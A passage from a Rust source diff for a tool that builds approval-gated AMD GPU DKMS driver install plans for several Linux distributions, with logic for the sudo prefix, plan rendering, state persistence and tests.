`rhel/`. Gate strictly on `ID_LIKE` + // naming `rhel`: Oracle Linux advertises only `ID_LIKE=fedora` and boots the + // UEK kernel, so it must keep its dedicated `("ol", ...)` flow and never be + // captured here with RHCK kernel commands that would fail to install. Guard + // the `ol`/`oracle` IDs explicitly as well, in case a future OL release adds + // `rhel` to `ID_LIKE`. + if mentions("rhel") && !matches!(os_id, "ol" | "oracle") && is_supported_el_version(version_id) + { + return Some(dnf_driver_plan( + os_id.to_owned(), + version_id.to_owned(), + codename.to_owned(), + repo_version.to_owned(), + package_release.to_owned(), + dkms, + DnfDriverDistro::Generic, + escalation, + )); + } + + // No SUSE-family fallback: SLES is matched exactly, and community rebuilds + // such as openSUSE Leap share the SLES version scheme but lack SUSEConnect + // entitlements, so the SLES plan's `SUSEConnect` commands would fail. They + // intentionally remain unsupported rather than producing a broken plan. + + None +} + +/// The set of Enterprise-Linux versions AMD documents for the driver install, +/// used to gate `ID_LIKE`-based matching of RHEL rebuilds. +fn is_supported_el_version(version_id: &str) -> bool { + matches!(version_id, "10.1" | "10.0" | "9.7" | "9.6" | "9.4" | "8.10") +} + +#[derive(Debug, Clone, Copy)] +enum DnfDriverDistro { + Rhel, + Oracle, + Rocky, + /// A RHEL rebuild matched via `ID_LIKE` (e.g. AlmaLinux, CentOS Stream): + /// standard RHEL kernels, served from the vendor-neutral `el/` repo path. + Generic, +} + +fn apt_driver_plan( + os_id: String, + version_id: String, + codename: String, + repo_version: String, + dkms: bool, + include_linux_modules_extra: bool, + escalation: PrivilegeEscalation, +) -> DriverInstallPlan { + // Empty when already root, so no command depends on a `sudo` binary that a + // container or minimal image very likely does not have. + let sudo = escalation.prefix(); + let mut commands = Vec::new(); + if dkms { + commands.extend([ + driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}apt-get update"), + ), + driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}apt-get install -y ca-certificates curl gnupg"), + ), + ]); + let header_command = if include_linux_modules_extra { + format!( + "{sudo}apt-get install -y \"linux-headers-$(uname -r)\" \"linux-modules-extra-$(uname -r)\"" + ) + } else { + format!("{sudo}apt-get install -y \"linux-headers-$(uname -r)\"") + }; + commands.push(driver_command(DriverCommandPhase::Prepare, &header_command)); + commands.extend([ + driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}install -m 0755 -d /etc/apt/keyrings"), + ), + driver_command( + DriverCommandPhase::Prepare, + &format!( + "curl -fsSL https://repo.radeon.com/rocm/rocm.gpg.key | {sudo}gpg --dearmor -o /etc/apt/keyrings/rocm.gpg" + ), + ), + driver_command( + DriverCommandPhase::Prepare, + &format!( + "printf '%s\\n' 'deb [arch=amd64 signed-by=/etc/apt/keyrings/rocm.gpg] https://repo.radeon.com/graphics/{repo_version}/ubuntu {codename} main' | {sudo}tee /etc/apt/sources.list.d/amdgpu.list >/dev/null" + ), + ), + driver_command( + DriverCommandPhase::Prepare, + &format!( + "printf '%s\\n' 'Package: *' 'Pin: release o=repo.radeon.com' 'Pin-Priority: 600' | {sudo}tee /etc/apt/preferences.d/rocm-pin-600 >/dev/null" + ), + ), + driver_command(DriverCommandPhase::Prepare, &format!("{sudo}apt-get update")), + ]); + commands.push(driver_command( + DriverCommandPhase::Execute, + &format!("{sudo}apt-get install -y amdgpu-dkms"), + )); + commands.extend([ + driver_command(DriverCommandPhase::Verify, "dkms status amdgpu"), + driver_command(DriverCommandPhase::Verify, "test -e /dev/kfd"), + driver_command( + DriverCommandPhase::Verify, + "ls /dev/dri/renderD* >/dev/null", + ), + ]); + } + + DriverInstallPlan { + supported: true, + mutating: dkms, + policy: "linux_official_amd_dkms_wrapper".to_owned(), + os_id, + version_id, + codename, + repo_version, + reason: if dkms { + "Plan uses AMD's package-manager DKMS flow and requires explicit approval before execution." + } else { + "DKMS was not requested; this is a non-mutating preflight plan." + } + .to_owned(), + preflight_checks: if dkms { + let mut checks = driver_root_preflight_checks(escalation); + checks.push("`apt-get` package manager is available".to_owned()); + checks + } else { + Vec::new() + }, + commands, + checks: vec![ + "dkms status amdgpu".to_owned(), + "/sys/module/amdgpu".to_owned(), + "/dev/kfd".to_owned(), + "/dev/dri/renderD*".to_owned(), + "amd-smi version if present".to_owned(), + "rocminfo if present".to_owned(), + ], + // Kernel module: not live until the machine comes back up. + reboot_required: true, + } +} + +// Same shape as the other distro plan builders: a flat list of resolved facts +// the command templates read, one of which is now the escalation prefix. +#[allow(clippy::too_many_arguments)] +fn dnf_driver_plan( + os_id: String, + version_id: String, + codename: String, + repo_version: String, + package_release: String, + dkms: bool, + distro: DnfDriverDistro, + escalation: PrivilegeEscalation, +) -> DriverInstallPlan { + // Empty when already root, so no command depends on a `sudo` binary that a + // container or minimal image very likely does not have. + let sudo = escalation.prefix(); + let mut commands = Vec::new(); + if dkms { + match distro { + DnfDriverDistro::Rhel | DnfDriverDistro::Generic => { + commands.extend( + rhel_kernel_prepare_commands(&version_id, escalation) + .into_iter() + .map(|command| driver_command(DriverCommandPhase::Prepare, &command)), + ); + } + DnfDriverDistro::Oracle => { + commands.push(driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}dnf install -y \"kernel-uek-devel-$(uname -r)\""), + )); + } + DnfDriverDistro::Rocky => { + commands.push(driver_command( + DriverCommandPhase::Prepare, + &format!( + "{sudo}dnf install -y kernel-headers kernel-devel kernel-devel-matched" + ), + )); + } + } + commands.push(driver_command( + DriverCommandPhase::Prepare, + &format!( + "{sudo}dnf install -y {}", + amdgpu_install_rpm_url(&repo_version, &package_release, &version_id, distro) + ), + )); + commands.push(driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}dnf clean all"), + )); + commands.push(driver_command( + DriverCommandPhase::Execute, + &format!("{sudo}dnf install -y amdgpu-dkms"), + )); + commands.extend([ + driver_command(DriverCommandPhase::Verify, "dkms status amdgpu"), + driver_command(DriverCommandPhase::Verify, "test -e /dev/kfd"), + driver_command( + DriverCommandPhase::Verify, + "ls /dev/dri/renderD* >/dev/null", + ), + ]); + } + + DriverInstallPlan { + supported: true, + mutating: dkms, + policy: "linux_official_amd_dkms_wrapper".to_owned(), + os_id, + version_id, + codename, + repo_version, + reason: if dkms { + "Plan uses AMD's documented DNF DKMS flow and requires explicit approval before execution." + } else { + "DKMS was not requested; this is a non-mutating preflight plan." + } + .to_owned(), + preflight_checks: if dkms { + let mut checks = driver_root_preflight_checks(escalation); + checks.push("`dnf` package manager is available".to_owned()); + checks.push( + "enterprise Linux repositories are registered and current before approval" + .to_owned(), + ); + checks + } else { + Vec::new() + }, + commands, + checks: vec![ + "dkms status amdgpu".to_owned(), + "/sys/module/amdgpu".to_owned(), + "/dev/kfd".to_owned(), + "/dev/dri/renderD*".to_owned(), + "amd-smi version if present".to_owned(), + "rocminfo if present".to_owned(), + ], + // Kernel module: not live until the machine comes back up. + reboot_required: true, + } +} + +fn sles_driver_plan( + os_id: String, + version_id: String, + codename: String, + repo_version: String, + package_release: String, + dkms: bool, + escalation: PrivilegeEscalation, +) -> DriverInstallPlan { + // Empty when already root, so no command depends on a `sudo` binary that a + // container or minimal image very likely does not have. + let sudo = escalation.prefix(); + let mut commands = Vec::new(); + if dkms { + commands.extend([ + driver_command( + DriverCommandPhase::Prepare, + &format!( + "{sudo}SUSEConnect -p sle-module-desktop-applications/{version_id}/x86_64" + ), + ), + driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}SUSEConnect -p sle-module-development-tools/{version_id}/x86_64"), + ), + driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}SUSEConnect -p PackageHub/{version_id}/x86_64"), + ), + driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}zypper refresh"), + ), + driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}zypper install -y kernel-default-devel"), + ), + driver_command( + DriverCommandPhase::Prepare, + &format!( + "{sudo}zypper --no-gpg-checks install -y {}", + amdgpu_install_sles_rpm_url(&repo_version, &package_release, &version_id) + ), + ), + driver_command( + DriverCommandPhase::Prepare, + &format!("{sudo}zypper refresh"), + ), + driver_command( + DriverCommandPhase::Execute, + &format!("{sudo}zypper install -y amdgpu-dkms"), + ), + driver_command(DriverCommandPhase::Verify, "dkms status amdgpu"), + driver_command(DriverCommandPhase::Verify, "test -e /dev/kfd"), + driver_command( + DriverCommandPhase::Verify, + "ls /dev/dri/renderD* >/dev/null", + ), + ]); + } + + DriverInstallPlan { + supported: true, + mutating: dkms, + policy: "linux_official_amd_dkms_wrapper".to_owned(), + os_id, + version_id, + codename, + repo_version, + reason: if dkms { + "Plan uses AMD's documented SLES DKMS flow and requires explicit approval before execution." + } else { + "DKMS was not requested; this is a non-mutating preflight plan." + } + .to_owned(), + preflight_checks: if dkms { + let mut checks = driver_root_preflight_checks(escalation); + checks.push("`zypper` package manager is available".to_owned()); + checks.push( + "`SUSEConnect` is available and the host is registered before approval".to_owned(), + ); + checks + } else { + Vec::new() + }, + commands, + checks: vec![ + "dkms status amdgpu".to_owned(), + "/sys/module/amdgpu".to_owned(), + "/dev/kfd".to_owned(), + "/dev/dri/renderD*".to_owned(), + "amd-smi version if present".to_owned(), + "rocminfo if present".to_owned(), + ], + // Kernel module: not live until the machine comes back up. + reboot_required: true, + } +} + +fn rhel_kernel_prepare_commands(version_id: &str, escalation: PrivilegeEscalation) -> Vec { + let sudo = escalation.prefix(); + if version_id.starts_with("8.") { + vec![ + format!("{sudo}dnf install -y \"kernel-headers-$(uname -r)\""), + format!("{sudo}dnf install -y \"kernel-devel-$(uname -r)\""), + ] + } else { + vec![ + format!("{sudo}dnf install -y \"kernel-headers-$(uname -r)\""), + format!("{sudo}dnf install -y \"kernel-devel-$(uname -r)\""), + format!("{sudo}dnf install -y \"kernel-devel-matched-$(uname -r)\""), + ] + } +} + +fn amdgpu_install_rpm_url( + repo_version: &str, + package_release: &str, + version_id: &str, + distro: DnfDriverDistro, +) -> String { + let repo_family = match distro { + DnfDriverDistro::Rhel => "rhel", + DnfDriverDistro::Oracle | DnfDriverDistro::Rocky | DnfDriverDistro::Generic => "el", + }; + let repo_version_path = dnf_repo_version_path(version_id); + let el_major = linux_major_version(version_id); + format!( + "https://repo.radeon.com/amdgpu-install/{repo_version}/{repo_family}/{repo_version_path}/amdgpu-install-{repo_version}.{package_release}-1.el{el_major}.noarch.rpm" + ) +} + +fn amdgpu_install_sles_rpm_url( + repo_version: &str, + package_release: &str, + version_id: &str, +) -> String { + format!( + "https://repo.radeon.com/amdgpu-install/{repo_version}/sle/{version_id}/amdgpu-install-{repo_version}.{package_release}-1.noarch.rpm" + ) +} + +fn dnf_repo_version_path(version_id: &str) -> String { + // AMD serves EL 8 and 10 from a major-version path (el8/, el10/, rhel/10/), + // but EL 9 from the point-release path (el/9.7/, rhel/9.6/). Keying on the + // major version keeps this correct for RHEL, Oracle Linux, and ID_LIKE-matched + // rebuilds alike, without depending on the specific distro `ID`. + let major = linux_major_version(version_id); + match major { + "8" | "10" => major.to_owned(), + _ => version_id.to_owned(), + } +} + +fn linux_major_version(version_id: &str) -> &str { + version_id.split('.').next().unwrap_or(version_id) +} + +/// Preconditions about reaching root for a driver plan. +/// +/// These differ by escalation: a plan that will prefix `sudo` additionally +/// depends on a `sudo` binary being installed, while a plan built as root does +/// not. Listing that precondition when already root would state a requirement +/// the plan is not relying on — which is exactly the contradiction that made +/// the unconditional prefix confusing to debug. +fn driver_root_preflight_checks(escalation: PrivilegeEscalation) -> Vec { + let mut checks = + vec!["root access: run as root, or ensure `sudo -v` succeeds before approval".to_owned()]; + if escalation.needs_sudo_binary() { + checks.push("`sudo` command is available when not running as root".to_owned()); + } + checks +} + +fn driver_command(phase: DriverCommandPhase, command: &str) -> DriverPlanCommand { + DriverPlanCommand { + phase, + command: command.to_owned(), + } +} + +/// Resolve a `${VAR:-default}` shell parameter-expansion template to its +/// effective value: the value of `VAR` when it is set and non-empty (matching +/// the shell `:-` semantics), otherwise the literal default. This is resolved +/// once at plan-build time so the concrete value is baked into both the +/// human-readable summary and the commands the plan runs, rather than leaking an +/// unexpanded `${...}` placeholder into user-facing output or depending on the +/// runtime shell — which, for the single-quoted apt `sources.list` line, would +/// never expand it at all. +/// +/// Only a single, flat `${VAR:-default}` template is recognized. Anything else — +/// a bare `${VAR}`, a `${VAR:=x}`/`${VAR-x}` form, or a nested default such as +/// `${A:-${B:-x}}` whose default itself contains `${` — is returned unchanged, so +/// an unresolvable shape degrades to its literal input rather than to a +/// half-resolved string. +fn resolve_shell_default_template(expr: &str) -> String { + let Some(inner) = expr.strip_prefix("${").and_then(|s| s.strip_suffix('}')) else { + return expr.to_owned(); + }; + let Some((var, default)) = inner.split_once(":-") else { + return expr.to_owned(); + }; + if default.contains("${") { + // Nested or embedded templates are beyond this flat matcher; return the + // input untouched rather than emitting a partially resolved string. + return expr.to_owned(); + } + std::env::var(var) + .ok() + .filter(|value| !value.is_empty()) + .unwrap_or_else(|| default.to_owned()) +} + +fn render_driver_install_plan(plan: &DriverInstallPlan, yes: bool, dry_run: bool) -> String { + let mut output = String::new(); + let _ = writeln!(output, "driver install plan"); + let _ = writeln!(output, " policy: {}", plan.policy); + let _ = writeln!(output, " supported: {}", plan.supported); + let _ = writeln!(output, " mutating: {}", plan.mutating); + let _ = writeln!( + output, + " approval: {}", + driver_plan_approval_label(plan, yes, dry_run) + ); + let _ = writeln!(output, " dry_run: {dry_run}"); + let _ = writeln!(output, " os_id: {}", empty_as_unknown(&plan.os_id)); + let _ = writeln!( + output, + " version_id: {}", + empty_as_unknown(&plan.version_id) + ); + let _ = writeln!(output, " codename: {}", empty_as_unknown(&plan.codename)); + let _ = writeln!(output, " repo_version: {}", plan.repo_version); + let _ = writeln!(output, " reason: {}", plan.reason); + if !plan.preflight_checks.is_empty() { + let _ = writeln!(output, " preflight_checks:"); + for check in &plan.preflight_checks { + let _ = writeln!(output, " {check}"); + } + } + let execution_commands = plan + .commands + .iter() + .filter(|command| { + matches!( + command.phase, + DriverCommandPhase::Prepare | DriverCommandPhase::Execute + ) + }) + .collect::>(); + if execution_commands.is_empty() { + let _ = writeln!(output, " execution_commands: "); + } else { + let _ = writeln!(output, " execution_commands:"); + for command in execution_commands { + let _ = writeln!(output, " {:?}: {}", command.phase, command.command); + } + } + let verification_commands = plan + .commands + .iter() + .filter(|command| command.phase == DriverCommandPhase::Verify) + .collect::>(); + // A plan that changes nothing kernel-side is live as soon as it finishes, so + // labelling its checks "post_reboot" would tell the user to reboot for + // nothing — and would contradict the `reboot_required: false` this same plan + // reports after executing. + let checks_label = if plan.reboot_required { + "post_reboot" + } else { + "post_install" + }; + if !verification_commands.is_empty() { + let _ = writeln!(output, " {checks_label}_check_commands:"); + for command in verification_commands { + let _ = writeln!(output, " {}", command.command); + } + } + if !plan.checks.is_empty() { + let _ = writeln!(output, " {checks_label}_checks:"); + for check in &plan.checks { + let _ = writeln!(output, " {check}"); + } + } + if plan.supported && plan.mutating && !yes && !dry_run { + let _ = writeln!( + output, + " action: rerun with --yes after reviewing this plan, or approve from the TUI" + ); + } else if plan.supported && plan.mutating && dry_run { + let _ = writeln!( + output, + " action: dry run only; no driver commands executed" + ); + } else if plan.supported && !plan.mutating { + let _ = writeln!( + output, + " action: no driver commands will be executed; add --dkms to plan a native DKMS driver install" + ); + } else if !plan.supported { + let _ = writeln!(output, " action: no driver commands will be executed"); + } + output +} + +const fn driver_plan_approval_label( + plan: &DriverInstallPlan, + yes: bool, + dry_run: bool, +) -> &'static str { + if !plan.supported || !plan.mutating || dry_run { + "not required" + } else if yes { + "approved" + } else { + "required" + } +} + +fn codename_for_version(os_id: &str, version_id: &str) -> Option<&'static str> { + match (os_id, version_id) { + ("ubuntu", "22.04") => Some("jammy"), + ("ubuntu", "24.04") => Some("noble"), + ("debian", "12") => Some("jammy"), + ("debian", "13") => Some("noble"), + _ => None, + } +} + +fn run_driver_shell_command(command: &str) -> Result<()> { + run_shell_command_with_stdin(command, Stdio::null()) +} + +/// Run a hardcoded shell command, wiring its stdin to `stdin`. +/// +/// Most install commands run with a null stdin, but privileged commands that may +/// trigger an interactive `sudo` password prompt (such as the OpenMPI install +/// approved with `--yes`) must inherit the terminal so the user can respond. +fn run_shell_command_with_stdin(command: &str, stdin: Stdio) -> Result<()> { + let (program, args) = shell_command_for_host(command); + let status = ProcessCommand::new(program) + .args(args) + .stdin(stdin) + .status() + .with_context(|| format!("failed to launch `{command}`"))?; + if !status.success() { + bail!("`{command}` exited with {status}"); + } + Ok(()) +} + +fn driver_install_state_path(paths: &AppPaths) -> PathBuf { + paths.data_dir.join("driver").join("state.json") +} + +fn write_driver_install_state(paths: &AppPaths, state: &DriverInstallState) -> Result<()> { + let path = driver_install_state_path(paths); + let parent = path.parent().context("driver state path has no parent")?; + fs::create_dir_all(parent)?; + fs::write(&path, serde_json::to_vec_pretty(state)?)?; + Ok(()) +} + +fn read_driver_install_state(paths: &AppPaths) -> Result> { + let path = driver_install_state_path(paths); + if !path.is_file() { + return Ok(None); + } + let bytes = fs::read(&path).with_context(|| format!("failed to read {}", path.display()))?; + let state = serde_json::from_slice(&bytes) + .with_context(|| format!("failed to parse {}", path.display()))?; + Ok(Some(state)) +} + +fn current_boot_id() -> Option { + fs::read_to_string("/proc/sys/kernel/random/boot_id") + .ok() + .map(|value| value.trim().to_owned()) + .filter(|value| !value.is_empty()) +} + +fn driver_reboot_observed(executed_boot_id: Option<&str>) -> bool { + let Some(executed_boot_id) = executed_boot_id else { + return false; + }; + current_boot_id() + .as_deref() + .is_some_and(|current| current != executed_boot_id) +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::tests::{ScopedTestEnv, test_paths}; + + fn test_examine(os: &str, wsl: bool) -> ExamineSummary { + ExamineSummary { + os: os.to_owned(), + arch: "x86_64".to_owned(), + kernel: Some("6.8.0-test".to_owned()), + distro: Some("test distro".to_owned()), + cpu: Some("AMD Ryzen".to_owned()), + system_ram_gib: Some(64.0), + interactive_terminal: false, + default_engine: "vllm".to_owned(), + detected_gfx_target: Some("gfx1201".to_owned()), + compatible_therock_family: Some("gfx120X-all".to_owned()), + detected_therock_family: None, + driver: rocm_core::DriverSummary { + policy: "linux_official_amd_dkms_wrapper".to_owned(), + status: "amdgpu_missing".to_owned(), + detail: Some("/dev/kfd missing".to_owned()), + }, + legacy_rocm: rocm_core::LegacyRocmSummary { + status: "not_detected".to_owned(), + paths: Vec::new(), + detail: None, + version: None, + }, + wsl: wsl.then_some(rocm_core::WslSummary { + is_wsl: true, + dxg_device: true, + dxcore: true, + librocdxg: false, + rocdxg_dids: false, + ldconfig_librocdxg: false, + rocminfo: false, + cargo: false, + detail: Some("missing librocdxg".to_owned()), + }), + managed_runtime_count: 0, + managed_service_count: 0, + model_cache_entries: 0, + config_dir: PathBuf::from("/tmp/config"), + data_dir: PathBuf::from("/tmp/data"), + cache_dir: PathBuf::from("/tmp/cache"), + } + } + + /// Every distro whose plan actually emits privileged commands, so the + /// escalation tests below sweep all of them rather than whichever one was + /// remembered. Adding a distro to the planner without adding it here would + /// leave its commands unswept. + fn dkms_planning_os_releases() -> Vec<(&'static str, &'static str)> { + vec![ + ( + "ubuntu", + "ID=ubuntu\nVERSION_ID=\"24.04\"\nVERSION_CODENAME=noble\n", + ), + ("debian", "ID=debian\nVERSION_ID=\"12\"\n"), + ("rhel", "ID=rhel\nVERSION_ID=\"9.7\"\n"), + ("rhel-8", "ID=rhel\nVERSION_ID=\"8.10\"\n"), + ("oracle", "ID=ol\nVERSION_ID=\"9.7\"\n"), + ("rocky", "ID=rocky\nVERSION_ID=\"9.4\"\n"), + ("sles", "ID=sles\nVERSION_ID=\"15.7\"\n"), + ( + "almalinux-via-id-like", + "ID=almalinux\nVERSION_ID=\"9.4\"\nID_LIKE=\"rhel centos fedora\"\n", + ), + ] + } + + fn plan_commands(os_release: &str, escalation: PrivilegeEscalation) -> Vec { + build_driver_install_plan(&test_examine("linux", false), os_release, true, escalation) + .commands + .into_iter() + .map(|command| command.command) + .collect() + } + + #[test] + fn driver_plan_as_root_never_emits_sudo() { + // The defect: every command was prefixed `sudo` unconditionally, so on a + // root host without the binary the first one died with `sudo: not found` + // before any driver work. This asserts the ABSENCE of `sudo` across every + // distro rather than checking known commands one by one — a templating + // site missed on some distro fails here instead of shipping. + for (label, os_release) in dkms_planning_os_releases() { + let commands = plan_commands(os_release, PrivilegeEscalation::AlreadyRoot); + assert!( + !commands.is_empty(), + "{label}: expected a dkms plan to emit commands" + ); + for command in &commands { + assert!( + !command.contains("sudo"), + "{label}: a plan built as root must not invoke sudo, got `{command}`" + ); + } + } + } + + #[test] + fn driver_plan_off_root_still_escalates_every_privileged_command() { + // The other half of the contract: dropping `sudo` when root must not drop + // it when a normal user runs the same plan. Verify-phase commands are + // read-only probes and are deliberately unprivileged, so only the + // mutating phases are required to escalate. + for (label, os_release) in dkms_planning_os_releases() { + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let privileged: Vec<&DriverPlanCommand> = plan + .commands + .iter() + .filter(|command| { + matches!( + command.phase, + DriverCommandPhase::Prepare | DriverCommandPhase::Execute + ) + }) + .collect(); + assert!(!privileged.is_empty(), "{label}: expected privileged steps"); + for command in privileged { + assert!( + command.command.contains("sudo "), + "{label}: a plan built off root must escalate, got `{}`", + command.command + ); + } + } + } + + #[test] + fn driver_plan_as_root_keeps_shell_pipelines_intact() { + // `sudo` also appears mid-pipeline (`| sudo tee`, `| sudo gpg`), which a + // naive "strip a leading prefix" fix would miss. The pipeline must survive + // with the escalation removed from the right-hand side only. + let ubuntu = "ID=ubuntu\nVERSION_ID=\"24.04\"\nVERSION_CODENAME=noble\n"; + let commands = plan_commands(ubuntu, PrivilegeEscalation::AlreadyRoot); + assert!( + commands + .iter() + .any(|command| command.contains("| tee /etc/apt/sources.list.d/amdgpu.list")), + "the apt-source pipeline must still tee, unprefixed: {commands:?}" + ); + assert!( + commands + .iter() + .any(|command| command.contains("| gpg --dearmor -o /etc/apt/keyrings/rocm.gpg")), + "the keyring pipeline must still call gpg, unprefixed: {commands:?}" + ); + } + + #[test] + fn driver_plan_records_the_commands_it_will_actually_run() { + // `execution_commands()` is what lands in state.json. It must agree with + // the escalation the plan was built under, or the recorded history + // describes commands that never ran. + let ubuntu = "ID=ubuntu\nVERSION_ID=\"24.04\"\nVERSION_CODENAME=noble\n"; + let as_root = build_driver_install_plan( + &test_examine("linux", false), + ubuntu, + true, + PrivilegeEscalation::AlreadyRoot, + ); + assert!( + as_root + .execution_commands() + .iter() + .all(|command| !command.contains("sudo")), + "state.json must not record sudo commands for a root run" + ); + let off_root = build_driver_install_plan( + &test_examine("linux", false), + ubuntu, + true, + PrivilegeEscalation::Sudo, + ); + assert!( + off_root + .execution_commands() + .iter() + .all(|command| command.contains("sudo ")), + "state.json must record the sudo commands a non-root run performs" + ); + } + + #[test] + fn driver_plan_as_root_drops_the_sudo_binary_precondition() { + // The preflight claimed `sudo` must be installed even when the plan no + // longer uses it — the same contradiction the bug report called out + // between the stated preconditions and what execution actually did. + for (label, os_release) in dkms_planning_os_releases() { + let as_root = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::AlreadyRoot, + ); + assert!( + !as_root + .preflight_checks + .iter() + .any(|check| check.contains("`sudo` command is available")), + "{label}: a root plan must not require a sudo binary: {:?}", + as_root.preflight_checks + ); + let off_root = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + assert!( + off_root + .preflight_checks + .iter() + .any(|check| check.contains("`sudo` command is available")), + "{label}: a non-root plan still depends on a sudo binary" + ); + } + } + + #[test] + fn driver_plan_ubuntu_2404_uses_official_dkms_commands() { + let _env = ScopedTestEnv::with_amd_overrides_cleared(); + let os_release = r#" +ID=ubuntu +VERSION_ID="24.04" +VERSION_CODENAME=noble +"#; + let plan = build_driver_install_plan( + &test_examine("linux", false), + os_release, + true, + PrivilegeEscalation::Sudo, + ); + let commands = plan + .commands + .iter() + .map(|command| command.command.as_str()) + .collect::>(); + + assert!(plan.supported); + assert!(plan.mutating); + assert_eq!(plan.policy, "linux_official_amd_dkms_wrapper"); + assert!( + plan.preflight_checks + .iter() + .any(|check| check.contains("sudo -v")) + ); + assert!( + commands + .iter() + .any(|command| command.contains("linux-headers-$(uname -r)")) + ); + assert!( + commands + .iter() + .any(|command| command.contains("linux-modules-extra-$(uname -r)")) + ); + assert!( + commands + .iter() + .any(|command| command.contains("repo.radeon.com/graphics")) + ); + assert!( + commands + .iter() + .any(|command| command.contains("amdgpu-dkms")) + ); + let rendered = render_driver_install_plan(&plan, false, false); + assert!(rendered.contains("approval: required")); + assert!(rendered.contains("preflight_checks:")); + assert!(rendered.contains("root access: run as root, or ensure `sudo -v` succeeds")); + assert!(rendered.contains("execution_commands:")); + assert!(rendered.contains("Prepare: sudo apt-get update")); + assert!(rendered.contains("Execute: sudo apt-get install -y amdgpu-dkms")); + assert!(rendered.contains("post_reboot_check_commands:")); + assert!(rendered.contains("dkms status amdgpu")); + assert!(rendered.contains("rerun with --yes")); + } + + #[test] + fn driver_plan_executor_runs_verify_after_execute() -> Result<()> { + let mut plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + plan.commands = vec![ + driver_command(DriverCommandPhase::Prepare, "prepare"), + driver_command(DriverCommandPhase::Execute, "execute"), + driver_command(DriverCommandPhase::Verify, "verify"), + ]; + let mut state = DriverInstallState { + approved_at_unix_ms: 1, + executed_at_unix_ms: None, + pre_driver: test_examine("linux", true).driver, + post_driver: None, + boot_id_at_execution: Some("boot".to_owned()), + reboot_required: plan.reboot_required, + reboot_observed: false, + commands: plan.execution_commands(), + reconciled_at_unix_ms: None, + reconciliation: None, + }; + let mut observed = Vec::new(); + + execute_driver_install_plan( + &plan, + &mut state, + |command| { + observed.push(command.to_owned()); + Ok(()) + }, + |_| Ok(()), + || Ok(test_examine("linux", true).driver), + )?; + + assert_eq!(observed, ["prepare", "execute", "verify"]); + assert!(state.executed_at_unix_ms.is_some()); + Ok(()) + } + + #[test] + fn driver_plan_executor_defers_verify_when_reboot_is_required() -> Result<()> { + let plan = build_driver_install_plan( + &test_examine("linux", false), + "ID=ubuntu\nVERSION_ID=\"24.04\"\nVERSION_CODENAME=noble\n", + true, + PrivilegeEscalation::Sudo, + ); + assert!(plan.reboot_required); + let expected = plan.execution_commands(); + let verify_commands = plan + .commands + .iter() + .filter(|command| command.phase == DriverCommandPhase::Verify) + .map(|command| command.command.clone()) + .collect::>(); + let mut state = DriverInstallState { + approved_at_unix_ms: 1, + executed_at_unix_ms: None, + pre_driver: test_examine("linux", false).driver, + post_driver: None, + boot_id_at_execution: Some("boot".to_owned()), + reboot_required: plan.reboot_required, + reboot_observed: false, + commands: plan.execution_commands(), + reconciled_at_unix_ms: None, + reconciliation: None, + }; + let mut observed = Vec::new(); + + execute_driver_install_plan( + &plan, + &mut state, + |command| { + observed.push(command.to_owned()); + Ok(()) + }, + |_| Ok(()), + || Ok(test_examine("linux", false).driver), + )?; + + assert_eq!(observed, expected); + assert!( + verify_commands + .iter() + .all(|command| !observed.contains(command)), + "reboot-gated Verify commands must be deferred: {verify_commands:?}" + ); + assert!(state.executed_at_unix_ms.is_some()); + assert!(state.reboot_required); + Ok(()) + } + + #[test] + fn failed_driver_verify_does_not_mark_execution_completed() -> Result<()> { + let (root, paths) = test_paths("driver-verify-failure-state"); + let mut plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + plan.commands = vec![ + driver_command(DriverCommandPhase::Prepare, "prepare"), + driver_command(DriverCommandPhase::Execute, "execute"), + driver_command(DriverCommandPhase::Verify, "verify"), + ]; + let mut state = DriverInstallState { + approved_at_unix_ms: 1, + executed_at_unix_ms: None, + pre_driver: test_examine("linux", true).driver, + post_driver: None, + boot_id_at_execution: Some("boot".to_owned()), + reboot_required: plan.reboot_required, + reboot_observed: false, + commands: plan.execution_commands(), + reconciled_at_unix_ms: None, + reconciliation: None, + }; + write_driver_install_state(&paths, &state)?; + let mut observed = Vec::new(); + let mut gathered = false; + + let error = execute_driver_install_plan( + &plan, + &mut state, + |command| { + observed.push(command.to_owned()); + if command == "verify" { + bail!("verification rejected the install"); + } + Ok(()) + }, + |state| write_driver_install_state(&paths, state), + || { + gathered = true; + Ok(test_examine("linux", true).driver) + }, + ) + .expect_err("failed verification must fail the install"); + let saved = read_driver_install_state(&paths)?.expect("state should remain readable"); + + assert_eq!(observed, ["prepare", "execute", "verify"]); + assert!(error.to_string().contains("driver command failed: verify")); + assert!( + !gathered, + "post-install state must not be gathered after failure" + ); + assert_eq!(state.executed_at_unix_ms, None); + assert!(state.post_driver.is_none()); + assert_eq!(saved.executed_at_unix_ms, None); + assert!(saved.post_driver.is_none()); + let _ = fs::remove_dir_all(root); + Ok(()) + } + + #[test] + fn failed_post_driver_gather_keeps_executed_state_persisted() -> Result<()> { + let (root, paths) = test_paths("driver-gather-failure-state"); + let mut plan = wsl_rocdxg_driver_plan(PrivilegeEscalation::Sudo); + plan.commands = vec![ + driver_command(DriverCommandPhase::Prepare, "prepare"), + driver_command(DriverCommandPhase::Execute, "execute"), + driver_command(DriverCommandPhase::Verify, "verify"), + ]; + let mut state = DriverInstallState { + approved_at_unix_ms: 1, + executed_at_unix_ms: None, + pre_driver: test_examine("linux", true).driver, + post_driver: None, + boot_id_at_execution: Some("boot".to_owned()), + reboot_required: plan.reboot_required, + reboot_observed: false, + commands: plan.execution_commands(), + reconciled_at_unix_ms: None, + reconciliation: None, + }; + write_driver_install_state(&paths, &state)?; + + let error = execute_driver_install_plan( + &plan, + &mut state, + |_| Ok(()), + |state| write_driver_install_state(&paths, state), + || bail!("post-driver gather failed"), + ) + 